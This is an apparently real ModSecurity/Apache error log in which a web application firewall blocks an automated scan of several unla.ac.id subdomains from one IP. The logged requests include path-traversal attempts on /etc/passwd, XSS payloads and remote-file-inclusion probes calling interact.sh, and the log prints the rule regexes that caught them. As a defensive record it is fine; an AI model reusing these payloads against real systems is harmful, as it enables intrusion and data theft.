[Tue Aug 29 11:55:35.776330 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAApHRjAAAAAP"]
[Tue Aug 29 11:55:35.831851 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16R8Co-f0AAApbUkQAAAAh"]
[Tue Aug 29 11:55:36.115715 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq4fUkAAAAJ"]
[Tue Aug 29 11:55:36.127675 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq3a5EAAAAI"]
[Tue Aug 29 11:55:36.130277 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAApbUkkAAAAh"]
[Tue Aug 29 11:55:36.203095 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq3a5MAAAAI"]
[Tue Aug 29 11:55:36.220506 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAqTvuUAAAAa"]
[Tue Aug 29 11:55:36.241159 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fUwAAAAJ"]
[Tue Aug 29 11:55:36.242972 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAqTvuYAAAAa"]
[Tue Aug 29 11:55:36.539119 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAqTvugAAAAa"]
[Tue Aug 29 11:55:36.555554 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq2Kd4AAAAE"]
[Tue Aug 29 11:55:36.555591 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fU8AAAAJ"]
[Tue Aug 29 11:55:36.578382 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq2Kd8AAAAE"]
[Tue Aug 29 11:55:36.607638 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAoz8IgAAAAS"]
[Tue Aug 29 11:55:36.662586 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAq4fVIAAAAJ"]
[Tue Aug 29 11:55:36.665298 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:key: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAqTvu0AAAAa"]
[Tue Aug 29 11:55:37.543491 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAolKtYAAAAe"]
[Tue Aug 29 11:55:37.543881 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAq4fVUAAAAJ"]
[Tue Aug 29 11:55:37.589742 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAq2KeEAAAAE"]
[Tue Aug 29 11:55:37.590118 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAqSwwAAAAAN"]
[Tue Aug 29 11:55:37.724931 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16ScCo-f0AAAq2KeIAAAAE"]
[Tue Aug 29 11:55:37.811797 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAqSwwEAAAAN"]
[Tue Aug 29 11:55:38.038476 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAolKtgAAAAe"]
[Tue Aug 29 11:55:38.108350 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAq3a5gAAAAI"]
[Tue Aug 29 11:55:38.111640 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAqeFYUAAAAx"]
[Tue Aug 29 11:55:38.113155 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAqTvvQAAAAa"]
[Tue Aug 29 11:55:38.121444 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAoz8JIAAAAS"]
[Tue Aug 29 11:55:38.128905 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAApHRj4AAAAP"]
[Tue Aug 29 11:55:38.166119 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAolKtoAAAAe"]
[Tue Aug 29 11:55:38.172571 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAq3a5oAAAAI"]
[Tue Aug 29 11:55:38.192137 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAq2KeUAAAAE"]
[Tue Aug 29 11:55:38.603614 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16SsCo-f0AAAqTvvcAAAAa"]
[Tue Aug 29 11:55:38.658877 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAApbUlUAAAAh"]
[Tue Aug 29 11:55:38.681514 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAq3a6AAAAAI"]
[Tue Aug 29 11:55:38.706307 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16SsCo-f0AAAq2KewAAAAE"]
[Tue Aug 29 11:55:38.756092 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16SsCo-f0AAAqeFYoAAAAx"]
[Tue Aug 29 11:55:39.676673 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16S8Co-f0AAAqSwxAAAAAN"]
